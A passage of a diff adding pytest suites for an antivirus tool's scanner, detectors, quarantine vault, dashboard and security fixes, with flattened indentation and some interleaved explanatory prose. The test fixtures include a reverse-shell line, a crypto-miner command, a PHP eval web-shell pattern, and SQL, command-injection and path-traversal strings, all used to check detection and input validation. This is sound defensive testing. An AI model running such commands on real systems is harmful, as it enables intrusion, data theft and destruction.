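    # No colon at all, or the colon belonged to a registry port
    # (e.g. "registry:5000/app"): treat as an implicit :latest.
    if not sep or "/" in tag:
        tag = "latest"
    if tag == "latest":
        return ["LatestTag.Container"]
    return []
```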
class TestProcessDetection:
def _make_scanner_and_container(self):
s = ContainerScanner()
s._docker_cmd = "/usr/bin/docker"
ci = ContainerInfo(
container_id="abc", name="test", image="img",
status="running", runtime="docker", created="",
)
return s, ci
def test_miner_detected(self):
s, ci = self._make_scanner_and_container()
ps_output = (
"USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\n"
"root 1 95.0 8.0 123456 65432 ? Sl 00:00 1:23 /usr/bin/xmrig --pool pool.example.com"
)
with patch.object(s, "_run_cmd", return_value=(ps_output, "", 0)):
threats = s._check_processes(ci)
names = [t.threat_name for t in threats]
assert any("CryptoMiner" in n for n in names)
def test_reverse_shell_detected(self):
s, ci = self._make_scanner_and_container()
ps_output = (
"USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\n"
"root 1 0.1 0.0 1234 432 ? S 00:00 0:00 bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"
)
with patch.object(s, "_run_cmd", return_value=(ps_output, "", 0)):
threats = s._check_processes(ci)
names = [t.threat_name for t in threats]
assert any("ReverseShell" in n for n in names)
def test_stopped_container_skipped(self):
s, ci = self._make_scanner_and_container()
ci.status = "stopped"
# _get_exec_prefix returns None for stopped containers
threats = s._check_processes(ci)
assert threats == []

View File

@@ -0,0 +1,119 @@
"""Tests for dashboard API endpoints."""
import pytest
from aiohttp import web
from ayn_antivirus.dashboard.api import setup_routes, _safe_int
from ayn_antivirus.dashboard.store import DashboardStore
from ayn_antivirus.dashboard.collector import MetricsCollector
@pytest.fixture
def store(tmp_path):
s = DashboardStore(str(tmp_path / "test_api.db"))
yield s
s.close()
@pytest.fixture
def app(store, tmp_path):
application = web.Application()
application["store"] = store
application["collector"] = MetricsCollector(store, interval=9999)
from ayn_antivirus.config import Config
cfg = Config()
cfg.db_path = str(tmp_path / "sigs.db")
application["config"] = cfg
setup_routes(application)
return application
# ------------------------------------------------------------------
# _safe_int unit tests
# ------------------------------------------------------------------
def test_safe_int_valid():
assert _safe_int("50", 10) == 50
assert _safe_int("0", 10, min_val=1) == 1
assert _safe_int("9999", 10, max_val=100) == 100
def test_safe_int_invalid():
assert _safe_int("abc", 10) == 10
assert _safe_int("", 10) == 10
assert _safe_int(None, 10) == 10
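These unit tests fully specify `_safe_int`: parse failures fall back to the default, and parsed values are clamped to optional bounds. A sketch of an implementation satisfying them (not necessarily the shipped code):

```python
def safe_int(value, default, min_val=None, max_val=None):
    """Parse a query-string value into a clamped int, falling back to default."""
    try:
        result = int(value)
    except (TypeError, ValueError):   # handles None, "", "abc"
        return default
    if min_val is not None:
        result = max(result, min_val)
    if max_val is not None:
        result = min(result, max_val)
    return result
```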
# ------------------------------------------------------------------
# API endpoint tests (async, require aiohttp_client)
# ------------------------------------------------------------------
@pytest.mark.asyncio
async def test_health_endpoint(app, aiohttp_client):
client = await aiohttp_client(app)
resp = await client.get("/api/health")
assert resp.status == 200
data = await resp.json()
assert "cpu_percent" in data
@pytest.mark.asyncio
async def test_status_endpoint(app, aiohttp_client):
client = await aiohttp_client(app)
resp = await client.get("/api/status")
assert resp.status == 200
data = await resp.json()
assert "hostname" in data
@pytest.mark.asyncio
async def test_threats_endpoint(app, store, aiohttp_client):
store.record_threat("/tmp/evil", "TestVirus", "malware", "HIGH")
client = await aiohttp_client(app)
resp = await client.get("/api/threats")
assert resp.status == 200
data = await resp.json()
assert data["count"] >= 1
@pytest.mark.asyncio
async def test_scans_endpoint(app, store, aiohttp_client):
store.record_scan("quick", "/tmp", 100, 5, 0, 2.5)
client = await aiohttp_client(app)
resp = await client.get("/api/scans")
assert resp.status == 200
data = await resp.json()
assert data["count"] >= 1
@pytest.mark.asyncio
async def test_logs_endpoint(app, store, aiohttp_client):
store.log_activity("Test log", "INFO", "test")
client = await aiohttp_client(app)
resp = await client.get("/api/logs")
assert resp.status == 200
data = await resp.json()
assert data["count"] >= 1
@pytest.mark.asyncio
async def test_containers_endpoint(app, aiohttp_client):
client = await aiohttp_client(app)
resp = await client.get("/api/containers")
assert resp.status == 200
data = await resp.json()
assert "runtimes" in data
@pytest.mark.asyncio
async def test_definitions_endpoint(app, aiohttp_client):
client = await aiohttp_client(app)
resp = await client.get("/api/definitions")
assert resp.status == 200
data = await resp.json()
assert "total_hashes" in data
@pytest.mark.asyncio
async def test_invalid_query_params(app, aiohttp_client):
client = await aiohttp_client(app)
resp = await client.get("/api/threats?limit=abc")
assert resp.status == 200 # Should not crash, uses default

View File

@@ -0,0 +1,148 @@
"""Tests for dashboard store."""
import threading
import pytest
from ayn_antivirus.dashboard.store import DashboardStore
@pytest.fixture
def store(tmp_path):
s = DashboardStore(str(tmp_path / "test_dashboard.db"))
yield s
s.close()
def test_record_and_get_metrics(store):
store.record_metric(
cpu=50.0, mem_pct=60.0, mem_used=4000, mem_total=8000,
disk_usage=[{"mount": "/", "percent": 50}],
load_avg=[1.0, 0.5, 0.3], net_conns=10,
)
latest = store.get_latest_metrics()
assert latest is not None
assert latest["cpu_percent"] == 50.0
assert latest["mem_percent"] == 60.0
assert latest["disk_usage"] == [{"mount": "/", "percent": 50}]
assert latest["load_avg"] == [1.0, 0.5, 0.3]
def test_record_and_get_threats(store):
store.record_threat(
"/tmp/evil", "TestVirus", "malware", "HIGH",
"test_det", "abc", "quarantined", "test detail",
)
threats = store.get_recent_threats(10)
assert len(threats) == 1
assert threats[0]["threat_name"] == "TestVirus"
assert threats[0]["action_taken"] == "quarantined"
def test_threat_stats(store):
store.record_threat("/a", "V1", "malware", "CRITICAL", "d", "", "detected", "")
store.record_threat("/b", "V2", "miner", "HIGH", "d", "", "killed", "")
store.record_threat("/c", "V3", "spyware", "MEDIUM", "d", "", "detected", "")
stats = store.get_threat_stats()
assert stats["total"] == 3
assert stats["by_severity"]["CRITICAL"] == 1
assert stats["by_severity"]["HIGH"] == 1
assert stats["by_severity"]["MEDIUM"] == 1
assert stats["last_24h"] == 3
assert stats["last_7d"] == 3
def test_record_and_get_scans(store):
store.record_scan("full", "/", 1000, 50, 2, 10.5)
scans = store.get_recent_scans(10)
assert len(scans) == 1
assert scans[0]["files_scanned"] == 1000
assert scans[0]["scan_type"] == "full"
assert scans[0]["status"] == "completed"
def test_scan_chart_data(store):
store.record_scan("full", "/", 100, 5, 1, 5.0)
data = store.get_scan_chart_data(30)
assert len(data) >= 1
row = data[0]
assert "day" in row
assert "scans" in row
assert "threats" in row
def test_sig_updates(store):
store.record_sig_update("malwarebazaar", hashes=100, ips=50, domains=20, urls=10)
updates = store.get_recent_sig_updates(10)
assert len(updates) == 1
assert updates[0]["feed_name"] == "malwarebazaar"
stats = store.get_sig_stats()
assert stats["total_hashes"] == 100
assert stats["total_ips"] == 50
assert stats["total_domains"] == 20
assert stats["total_urls"] == 10
def test_activity_log(store):
store.log_activity("Test message", "INFO", "test")
logs = store.get_recent_logs(10)
assert len(logs) == 1
assert logs[0]["message"] == "Test message"
assert logs[0]["level"] == "INFO"
assert logs[0]["source"] == "test"
def test_metrics_history(store):
store.record_metric(
cpu=10, mem_pct=20, mem_used=1000, mem_total=8000,
disk_usage=[], load_avg=[0.1], net_conns=5,
)
store.record_metric(
cpu=20, mem_pct=30, mem_used=2000, mem_total=8000,
disk_usage=[], load_avg=[0.2], net_conns=10,
)
history = store.get_metrics_history(hours=1)
assert len(history) == 2
assert history[0]["cpu_percent"] == 10
assert history[1]["cpu_percent"] == 20
def test_cleanup_retains_fresh(store):
"""Cleanup with 0 hours should not delete just-inserted metrics."""
store.record_metric(
cpu=10, mem_pct=20, mem_used=1000, mem_total=8000,
disk_usage=[], load_avg=[], net_conns=0,
)
store.cleanup_old_metrics(hours=0)
assert store.get_latest_metrics() is not None
def test_empty_store_returns_none(store):
"""Empty store returns None / empty lists gracefully."""
assert store.get_latest_metrics() is None
assert store.get_recent_threats(10) == []
assert store.get_recent_scans(10) == []
assert store.get_recent_logs(10) == []
stats = store.get_threat_stats()
assert stats["total"] == 0
def test_thread_safety(store):
"""Concurrent writes from multiple threads should not crash."""
errors = []
def writer(n):
try:
for i in range(10):
store.record_metric(
cpu=float(n * 10 + i), mem_pct=50, mem_used=4000,
mem_total=8000, disk_usage=[], load_avg=[], net_conns=0,
)
except Exception as e:
errors.append(e)
threads = [threading.Thread(target=writer, args=(i,)) for i in range(5)]
for t in threads:
t.start()
for t in threads:
t.join()
assert len(errors) == 0

View File

@@ -0,0 +1,48 @@
import pytest
def test_heuristic_detector_import():
from ayn_antivirus.detectors.heuristic_detector import HeuristicDetector
detector = HeuristicDetector()
assert detector is not None
def test_heuristic_suspicious_strings(tmp_path):
from ayn_antivirus.detectors.heuristic_detector import HeuristicDetector
malicious = tmp_path / "evil.php"
malicious.write_text("<?php eval(base64_decode('ZXZpbCBjb2Rl')); ?>")
detector = HeuristicDetector()
results = detector.detect(str(malicious))
assert len(results) > 0
def test_cryptominer_detector_import():
from ayn_antivirus.detectors.cryptominer_detector import CryptominerDetector
detector = CryptominerDetector()
assert detector is not None
def test_cryptominer_stratum_detection(tmp_path):
from ayn_antivirus.detectors.cryptominer_detector import CryptominerDetector
miner_config = tmp_path / "config.json"
miner_config.write_text('{"url": "stratum+tcp://pool.minexmr.com:4444", "user": "wallet123"}')
detector = CryptominerDetector()
results = detector.detect(str(miner_config))
assert len(results) > 0
def test_spyware_detector_import():
from ayn_antivirus.detectors.spyware_detector import SpywareDetector
detector = SpywareDetector()
assert detector is not None
def test_rootkit_detector_import():
from ayn_antivirus.detectors.rootkit_detector import RootkitDetector
detector = RootkitDetector()
assert detector is not None
def test_signature_detector_import():
from ayn_antivirus.detectors.signature_detector import SignatureDetector
assert SignatureDetector is not None
def test_yara_detector_graceful():
from ayn_antivirus.detectors.yara_detector import YaraDetector
detector = YaraDetector()
assert detector is not None

View File

@@ -0,0 +1,61 @@
import pytest
from datetime import datetime
from ayn_antivirus.core.engine import (
ThreatType, Severity, ScanType, ThreatInfo,
ScanResult, FileScanResult, ScanEngine
)
from ayn_antivirus.core.event_bus import EventBus, EventType
def test_threat_type_enum():
assert ThreatType.VIRUS.value is not None
assert ThreatType.MINER.value is not None
def test_severity_enum():
assert Severity.CRITICAL.value is not None
assert Severity.LOW.value is not None
def test_threat_info_creation():
threat = ThreatInfo(
path="/tmp/evil.sh",
threat_name="TestMalware",
threat_type=ThreatType.MALWARE,
severity=Severity.HIGH,
detector_name="test",
details="Test detection",
file_hash="abc123"
)
assert threat.path == "/tmp/evil.sh"
assert threat.threat_type == ThreatType.MALWARE
def test_scan_result_creation():
result = ScanResult(
scan_id="test-123",
start_time=datetime.now(),
end_time=datetime.now(),
files_scanned=100,
files_skipped=5,
threats=[],
scan_path="/tmp",
scan_type=ScanType.QUICK
)
assert result.files_scanned == 100
assert len(result.threats) == 0
def test_event_bus():
bus = EventBus()
received = []
bus.subscribe(EventType.THREAT_FOUND, lambda et, data: received.append(data))
bus.publish(EventType.THREAT_FOUND, {"test": True})
assert len(received) == 1
    assert received[0]["test"] is True
def test_scan_clean_file(tmp_path):
clean_file = tmp_path / "clean.txt"
clean_file.write_text("This is a perfectly normal text file with nothing suspicious.")
from ayn_antivirus.config import Config
config = Config()
engine = ScanEngine(config)
result = engine.scan_file(str(clean_file))
assert isinstance(result, FileScanResult)

View File

@@ -0,0 +1,117 @@
"""Tests for the event bus pub/sub system."""
import pytest
from ayn_antivirus.core.event_bus import EventBus, EventType
def test_subscribe_and_publish():
bus = EventBus()
received = []
bus.subscribe(EventType.THREAT_FOUND, lambda et, data: received.append(data))
bus.publish(EventType.THREAT_FOUND, {"test": True})
assert len(received) == 1
assert received[0]["test"] is True
def test_multiple_subscribers():
bus = EventBus()
r1, r2 = [], []
bus.subscribe(EventType.SCAN_STARTED, lambda et, d: r1.append(d))
bus.subscribe(EventType.SCAN_STARTED, lambda et, d: r2.append(d))
bus.publish(EventType.SCAN_STARTED, "go")
assert len(r1) == 1
assert len(r2) == 1
def test_unsubscribe():
bus = EventBus()
received = []
cb = lambda et, d: received.append(d)
bus.subscribe(EventType.FILE_SCANNED, cb)
bus.unsubscribe(EventType.FILE_SCANNED, cb)
bus.publish(EventType.FILE_SCANNED, "data")
assert len(received) == 0
def test_unsubscribe_nonexistent():
"""Unsubscribing a callback that was never registered should not crash."""
bus = EventBus()
bus.unsubscribe(EventType.FILE_SCANNED, lambda et, d: None)
def test_publish_no_subscribers():
"""Publishing with no subscribers should not crash."""
bus = EventBus()
bus.publish(EventType.SCAN_COMPLETED, "no crash")
def test_subscriber_exception_isolated():
"""A failing subscriber must not prevent other subscribers from running."""
bus = EventBus()
received = []
bus.subscribe(EventType.THREAT_FOUND, lambda et, d: 1 / 0) # will raise
bus.subscribe(EventType.THREAT_FOUND, lambda et, d: received.append(d))
bus.publish(EventType.THREAT_FOUND, "data")
assert len(received) == 1
def test_all_event_types():
"""Every EventType value can be published without error."""
bus = EventBus()
for et in EventType:
bus.publish(et, None)
def test_clear_all():
bus = EventBus()
received = []
bus.subscribe(EventType.THREAT_FOUND, lambda et, d: received.append(d))
bus.subscribe(EventType.SCAN_STARTED, lambda et, d: received.append(d))
bus.clear()
bus.publish(EventType.THREAT_FOUND, "a")
bus.publish(EventType.SCAN_STARTED, "b")
assert len(received) == 0
def test_clear_single_event():
bus = EventBus()
r1, r2 = [], []
bus.subscribe(EventType.THREAT_FOUND, lambda et, d: r1.append(d))
bus.subscribe(EventType.SCAN_STARTED, lambda et, d: r2.append(d))
bus.clear(EventType.THREAT_FOUND)
bus.publish(EventType.THREAT_FOUND, "a")
bus.publish(EventType.SCAN_STARTED, "b")
assert len(r1) == 0 # cleared
assert len(r2) == 1 # still active
def test_callback_receives_event_type():
"""Callback receives (event_type, data) — verify event_type is correct."""
bus = EventBus()
calls = []
bus.subscribe(EventType.QUARANTINE_ACTION, lambda et, d: calls.append((et, d)))
bus.publish(EventType.QUARANTINE_ACTION, "payload")
assert calls[0][0] is EventType.QUARANTINE_ACTION
assert calls[0][1] == "payload"
def test_duplicate_subscribe():
"""Subscribing the same callback twice should only register it once."""
bus = EventBus()
received = []
cb = lambda et, d: received.append(d)
bus.subscribe(EventType.SCAN_COMPLETED, cb)
bus.subscribe(EventType.SCAN_COMPLETED, cb)
bus.publish(EventType.SCAN_COMPLETED, "x")
assert len(received) == 1
def test_event_type_values():
"""All expected event types exist."""
expected = {
"THREAT_FOUND", "SCAN_STARTED", "SCAN_COMPLETED", "FILE_SCANNED",
"SIGNATURE_UPDATED", "QUARANTINE_ACTION", "REMEDIATION_ACTION",
"DASHBOARD_METRIC",
}
actual = {et.name for et in EventType}
assert expected == actual
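The event-bus suite above is effectively a behavioral spec: duplicate subscribes register once, a failing subscriber cannot block others, and unsubscribe/publish/clear on unknown keys are no-ops. A toy bus with those semantics (a sketch using plain keys instead of the real `EventType` enum):

```python
from collections import defaultdict

class MiniEventBus:
    """Toy pub/sub matching the semantics the tests pin down."""

    def __init__(self):
        self._subs = defaultdict(list)

    def subscribe(self, event, callback):
        if callback not in self._subs[event]:   # dedupe repeat subscribes
            self._subs[event].append(callback)

    def unsubscribe(self, event, callback):
        try:
            self._subs[event].remove(callback)
        except ValueError:
            pass                                # never registered: harmless

    def publish(self, event, data):
        for cb in list(self._subs.get(event, ())):
            try:
                cb(event, data)
            except Exception:
                pass                            # one bad subscriber can't block others

    def clear(self, event=None):
        if event is None:
            self._subs.clear()
        else:
            self._subs.pop(event, None)
```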

View File

@@ -0,0 +1,95 @@
"""Tests for real-time monitor."""
import pytest
import time
from ayn_antivirus.monitor.realtime import RealtimeMonitor
from ayn_antivirus.core.engine import ScanEngine
from ayn_antivirus.config import Config
@pytest.fixture
def monitor(tmp_path):
config = Config()
engine = ScanEngine(config)
m = RealtimeMonitor(config, engine)
yield m
if m.is_running:
m.stop()
def test_monitor_init(monitor):
assert monitor is not None
assert monitor.is_running is False
def test_monitor_should_skip():
"""Temporary / lock / editor files should be skipped."""
config = Config()
engine = ScanEngine(config)
m = RealtimeMonitor(config, engine)
assert m._should_skip("/tmp/test.tmp") is True
assert m._should_skip("/tmp/test.swp") is True
assert m._should_skip("/tmp/test.lock") is True
assert m._should_skip("/tmp/.#backup") is True
assert m._should_skip("/tmp/test.part") is True
assert m._should_skip("/tmp/test.txt") is False
assert m._should_skip("/tmp/test.py") is False
assert m._should_skip("/var/www/index.html") is False
def test_monitor_debounce(monitor):
"""After the first call records the path, an immediate repeat is debounced."""
    # Prime the path so it's recorded with the current monotonic time.
    # On fresh processes, monotonic() can be close to 0.0, which is the
    # default in _recent, so we explicitly set a realistic timestamp.
    monitor._recent["/tmp/test.txt"] = time.monotonic() - 10
assert monitor._is_debounced("/tmp/test.txt") is False
# Immediate second call should be debounced (within 2s window)
assert monitor._is_debounced("/tmp/test.txt") is True
def test_monitor_debounce_different_paths(monitor):
"""Different paths should not debounce each other."""
    # Prime both paths far enough in the past to avoid the initial-value edge case
    past = time.monotonic() - 10
    monitor._recent["/tmp/a.txt"] = past
    monitor._recent["/tmp/b.txt"] = past
monitor._recent["/tmp/b.txt"] = past
assert monitor._is_debounced("/tmp/a.txt") is False
assert monitor._is_debounced("/tmp/b.txt") is False
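The two debounce tests imply a per-path store of monotonic timestamps with a 2-second suppression window. A minimal standalone sketch of that mechanism (hypothetical class, not the monitor's actual `_is_debounced`):

```python
import time

class Debouncer:
    """Per-path debounce: first sighting passes, repeats within the window don't."""

    def __init__(self, window=2.0):
        self.window = window
        self._recent = {}   # path -> last monotonic timestamp

    def is_debounced(self, path):
        now = time.monotonic()
        last = self._recent.get(path)
        self._recent[path] = now
        return last is not None and (now - last) < self.window
```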
def test_monitor_start_stop(tmp_path, monitor):
monitor.start(paths=[str(tmp_path)], recursive=True)
assert monitor.is_running is True
time.sleep(0.3)
monitor.stop()
assert monitor.is_running is False
def test_monitor_double_start(tmp_path, monitor):
"""Starting twice should be harmless."""
monitor.start(paths=[str(tmp_path)])
assert monitor.is_running is True
monitor.start(paths=[str(tmp_path)]) # Should log warning, not crash
assert monitor.is_running is True
monitor.stop()
def test_monitor_stop_when_not_running(monitor):
"""Stopping when not running should be harmless."""
assert monitor.is_running is False
monitor.stop()
assert monitor.is_running is False
def test_monitor_nonexistent_path(monitor):
"""Non-existent paths should be skipped without crash."""
monitor.start(paths=["/nonexistent/path/xyz123"])
# Should still be running (observer started, just no schedules)
assert monitor.is_running is True
monitor.stop()

View File

@@ -0,0 +1,139 @@
"""Tests for auto-patcher."""
import pytest
import stat
from ayn_antivirus.remediation.patcher import AutoPatcher, RemediationAction
def test_patcher_init():
p = AutoPatcher(dry_run=True)
assert p.dry_run is True
assert p.actions == []
def test_patcher_init_live():
p = AutoPatcher(dry_run=False)
assert p.dry_run is False
def test_fix_permissions_dry_run(tmp_path):
f = tmp_path / "test.sh"
f.write_text("#!/bin/bash")
f.chmod(0o4755) # SUID
p = AutoPatcher(dry_run=True)
action = p.fix_permissions(str(f))
assert action is not None
assert action.success is True
assert action.dry_run is True
# In dry run, file should still have SUID
assert f.stat().st_mode & stat.S_ISUID
def test_fix_permissions_real(tmp_path):
f = tmp_path / "test.sh"
f.write_text("#!/bin/bash")
f.chmod(0o4755) # SUID
p = AutoPatcher(dry_run=False)
action = p.fix_permissions(str(f))
assert action.success is True
# SUID should be stripped
assert not (f.stat().st_mode & stat.S_ISUID)
def test_fix_permissions_already_safe(tmp_path):
f = tmp_path / "safe.txt"
f.write_text("hello")
f.chmod(0o644)
p = AutoPatcher(dry_run=False)
action = p.fix_permissions(str(f))
assert action.success is True
assert "already safe" in action.details
def test_fix_permissions_sgid(tmp_path):
f = tmp_path / "sgid.sh"
f.write_text("#!/bin/bash")
f.chmod(0o2755) # SGID
p = AutoPatcher(dry_run=False)
action = p.fix_permissions(str(f))
assert action.success is True
assert not (f.stat().st_mode & stat.S_ISGID)
def test_fix_permissions_world_writable(tmp_path):
f = tmp_path / "ww.txt"
f.write_text("data")
f.chmod(0o777) # World-writable
p = AutoPatcher(dry_run=False)
action = p.fix_permissions(str(f))
assert action.success is True
assert not (f.stat().st_mode & stat.S_IWOTH)
def test_block_domain_dry_run():
p = AutoPatcher(dry_run=True)
action = p.block_domain("evil.example.com")
assert action is not None
assert action.success is True
assert action.dry_run is True
assert "evil.example.com" in action.target
def test_block_ip_dry_run():
p = AutoPatcher(dry_run=True)
action = p.block_ip("1.2.3.4")
assert action.success is True
assert action.dry_run is True
assert "1.2.3.4" in action.target
def test_remediate_threat_dry_run(tmp_path):
# Create a dummy file
f = tmp_path / "malware.bin"
f.write_text("evil_payload")
f.chmod(0o4755)
p = AutoPatcher(dry_run=True)
threat = {
"path": str(f),
"threat_name": "Test.Malware",
"threat_type": "MALWARE",
"severity": "HIGH",
}
actions = p.remediate_threat(threat)
assert isinstance(actions, list)
assert len(actions) >= 1
# Should have at least a fix_permissions action
action_names = [a.action for a in actions]
assert "fix_permissions" in action_names
def test_remediate_threat_miner_with_domain():
p = AutoPatcher(dry_run=True)
threat = {
"threat_type": "MINER",
"domain": "pool.evil.com",
"ip": "1.2.3.4",
}
actions = p.remediate_threat(threat)
action_names = [a.action for a in actions]
assert "block_domain" in action_names
assert "block_ip" in action_names
def test_remediation_action_dataclass():
a = RemediationAction(
action="test_action", target="/tmp/test", details="testing",
success=True, dry_run=True,
)
assert a.action == "test_action"
assert a.target == "/tmp/test"
assert a.success is True
assert a.dry_run is True
def test_fix_ld_preload_missing():
"""ld.so.preload doesn't exist — should succeed gracefully."""
p = AutoPatcher(dry_run=True)
action = p.fix_ld_preload()
assert action.success is True

View File

@@ -0,0 +1,50 @@
import pytest
from ayn_antivirus.quarantine.vault import QuarantineVault
def test_quarantine_and_restore(tmp_path):
vault_dir = tmp_path / "vault"
key_file = tmp_path / "keys" / "vault.key"
vault = QuarantineVault(str(vault_dir), str(key_file))
test_file = tmp_path / "malware.txt"
test_file.write_text("this is malicious content")
threat_info = {
"threat_name": "TestVirus",
"threat_type": "virus",
"severity": "high"
}
qid = vault.quarantine_file(str(test_file), threat_info)
assert qid is not None
assert not test_file.exists()
assert vault.count() == 1
restore_path = tmp_path / "restored.txt"
vault.restore_file(qid, str(restore_path))
assert restore_path.exists()
assert restore_path.read_text() == "this is malicious content"
def test_quarantine_list(tmp_path):
vault_dir = tmp_path / "vault"
key_file = tmp_path / "keys" / "vault.key"
vault = QuarantineVault(str(vault_dir), str(key_file))
test_file = tmp_path / "test.txt"
test_file.write_text("content")
vault.quarantine_file(str(test_file), {"threat_name": "Test", "threat_type": "virus", "severity": "low"})
items = vault.list_quarantined()
assert len(items) == 1
def test_quarantine_delete(tmp_path):
vault_dir = tmp_path / "vault"
key_file = tmp_path / "keys" / "vault.key"
vault = QuarantineVault(str(vault_dir), str(key_file))
test_file = tmp_path / "test.txt"
test_file.write_text("content")
qid = vault.quarantine_file(str(test_file), {"threat_name": "Test", "threat_type": "virus", "severity": "low"})
    assert vault.delete_file(qid) is True
assert vault.count() == 0


@@ -0,0 +1,54 @@
import json
import pytest
from datetime import datetime
from ayn_antivirus.core.engine import ScanResult, ScanType, ThreatInfo, ThreatType, Severity
from ayn_antivirus.reports.generator import ReportGenerator
def _make_scan_result():
return ScanResult(
scan_id="test-001",
start_time=datetime.now(),
end_time=datetime.now(),
files_scanned=500,
files_skipped=10,
threats=[
ThreatInfo(
path="/tmp/evil.sh",
threat_name="ReverseShell",
threat_type=ThreatType.MALWARE,
severity=Severity.CRITICAL,
detector_name="heuristic",
details="Reverse shell detected",
file_hash="abc123"
)
],
scan_path="/tmp",
scan_type=ScanType.FULL
)
def test_text_report():
gen = ReportGenerator()
result = _make_scan_result()
text = gen.generate_text(result)
assert "AYN ANTIVIRUS" in text
assert "ReverseShell" in text
def test_json_report():
gen = ReportGenerator()
result = _make_scan_result()
j = gen.generate_json(result)
data = json.loads(j)
assert data["summary"]["total_threats"] == 1
def test_html_report():
gen = ReportGenerator()
result = _make_scan_result()
html = gen.generate_html(result)
assert "<html" in html
assert "ReverseShell" in html
assert "CRITICAL" in html
def test_save_report(tmp_path):
gen = ReportGenerator()
gen.save_report("test content", str(tmp_path / "report.txt"))
assert (tmp_path / "report.txt").read_text() == "test content"


@@ -0,0 +1,72 @@
"""Tests for scheduler."""
import pytest
from ayn_antivirus.core.scheduler import Scheduler, _cron_to_schedule, _parse_cron_field
from ayn_antivirus.config import Config
def test_scheduler_init():
config = Config()
s = Scheduler(config)
assert s is not None
assert s.config is config
def test_cron_parse_simple():
"""Standard daily-at-midnight expression."""
result = _cron_to_schedule("0 0 * * *")
assert result["minutes"] == [0]
assert result["hours"] == [0]
def test_cron_parse_step():
"""Every-5-minutes expression."""
result = _cron_to_schedule("*/5 * * * *")
assert 0 in result["minutes"]
assert 5 in result["minutes"]
assert 55 in result["minutes"]
assert len(result["minutes"]) == 12
def test_cron_parse_range():
"""Specific range of hours."""
result = _cron_to_schedule("30 9-17 * * *")
assert result["minutes"] == [30]
assert result["hours"] == list(range(9, 18))
def test_cron_parse_invalid():
"""Invalid cron expression raises ValueError."""
with pytest.raises(ValueError, match="5-field"):
_cron_to_schedule("bad input")
def test_schedule_scan():
config = Config()
s = Scheduler(config)
# Scheduling should not crash
s.schedule_scan("0 0 * * *", "full")
s.schedule_scan("30 2 * * *", "quick")
# Jobs should have been registered
jobs = s._scheduler.get_jobs()
assert len(jobs) >= 2
def test_schedule_update():
config = Config()
s = Scheduler(config)
s.schedule_update(interval_hours=6)
jobs = s._scheduler.get_jobs()
assert len(jobs) >= 1
def test_parse_cron_field_literal():
assert _parse_cron_field("5", 0, 59) == [5]
def test_parse_cron_field_comma():
assert _parse_cron_field("1,3,5", 0, 59) == [1, 3, 5]
def test_parse_cron_field_wildcard():
result = _parse_cron_field("*", 0, 6)
assert result == [0, 1, 2, 3, 4, 5, 6]


@@ -0,0 +1,197 @@
"""Security tests — validate fixes for audit findings."""
import pytest
# -----------------------------------------------------------------------
# Fix 2: SQL injection in ioc_db._count()
# -----------------------------------------------------------------------
class TestIOCTableWhitelist:
@pytest.fixture(autouse=True)
def setup_db(self, tmp_path):
from ayn_antivirus.signatures.db.ioc_db import IOCDatabase
self.db = IOCDatabase(tmp_path / "test_ioc.db")
self.db.initialize()
yield
self.db.close()
def test_valid_tables(self):
for table in ("ioc_ips", "ioc_domains", "ioc_urls"):
assert self.db._count(table) >= 0
def test_injection_blocked(self):
with pytest.raises(ValueError, match="Invalid table"):
self.db._count("ioc_ips; DROP TABLE ioc_ips; --")
def test_arbitrary_table_blocked(self):
with pytest.raises(ValueError, match="Invalid table"):
self.db._count("evil_table")
def test_valid_tables_frozenset(self):
from ayn_antivirus.signatures.db.ioc_db import IOCDatabase
assert isinstance(IOCDatabase._VALID_TABLES, frozenset)
assert IOCDatabase._VALID_TABLES == {"ioc_ips", "ioc_domains", "ioc_urls"}
# -----------------------------------------------------------------------
# Fix 4: Quarantine ID path traversal
# -----------------------------------------------------------------------
class TestQuarantineIDValidation:
@pytest.fixture(autouse=True)
def setup_vault(self, tmp_path):
from ayn_antivirus.quarantine.vault import QuarantineVault
self.vault = QuarantineVault(
tmp_path / "vault", tmp_path / "vault" / ".key"
)
def test_traversal_blocked(self):
with pytest.raises(ValueError, match="Invalid quarantine ID"):
self.vault._validate_qid("../../etc/passwd")
def test_too_short(self):
with pytest.raises(ValueError, match="Invalid quarantine ID"):
self.vault._validate_qid("abc")
def test_too_long(self):
with pytest.raises(ValueError, match="Invalid quarantine ID"):
self.vault._validate_qid("a" * 33)
def test_non_hex(self):
with pytest.raises(ValueError, match="Invalid quarantine ID"):
self.vault._validate_qid("GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG")
def test_uppercase_hex_rejected(self):
with pytest.raises(ValueError, match="Invalid quarantine ID"):
self.vault._validate_qid("A" * 32)
def test_valid_id(self):
assert self.vault._validate_qid("a" * 32) == "a" * 32
assert self.vault._validate_qid("0123456789abcdef" * 2) == "0123456789abcdef" * 2
def test_whitespace_stripped(self):
padded = " " + "a" * 32 + " "
assert self.vault._validate_qid(padded) == "a" * 32
# -----------------------------------------------------------------------
# Fix 3: Quarantine restore path traversal
# -----------------------------------------------------------------------
class TestRestorePathValidation:
@pytest.fixture(autouse=True)
def setup_vault(self, tmp_path):
from ayn_antivirus.quarantine.vault import QuarantineVault
self.vault = QuarantineVault(
tmp_path / "vault", tmp_path / "vault" / ".key"
)
def test_etc_blocked(self):
with pytest.raises(ValueError, match="protected path"):
self.vault._validate_restore_path("/etc/shadow")
def test_usr_bin_blocked(self):
with pytest.raises(ValueError, match="protected path"):
self.vault._validate_restore_path("/usr/bin/evil")
def test_cron_blocked(self):
with pytest.raises(ValueError, match="Refusing to restore"):
self.vault._validate_restore_path("/etc/cron.d/backdoor")
def test_systemd_blocked(self):
with pytest.raises(ValueError, match="Refusing to restore"):
self.vault._validate_restore_path("/etc/systemd/system/evil.service")
def test_safe_path_allowed(self):
result = self.vault._validate_restore_path("/tmp/restored.txt")
assert result.name == "restored.txt"
# -----------------------------------------------------------------------
# Fix 5: Container scanner command injection
# -----------------------------------------------------------------------
class TestContainerIDSanitization:
@pytest.fixture(autouse=True)
def setup_scanner(self):
from ayn_antivirus.scanners.container_scanner import ContainerScanner
self.scanner = ContainerScanner()
def test_semicolon_injection(self):
with pytest.raises(ValueError):
self.scanner._sanitize_id("abc; rm -rf /")
def test_dollar_injection(self):
with pytest.raises(ValueError):
self.scanner._sanitize_id("$(cat /etc/shadow)")
def test_backtick_injection(self):
with pytest.raises(ValueError):
self.scanner._sanitize_id("`whoami`")
def test_pipe_injection(self):
with pytest.raises(ValueError):
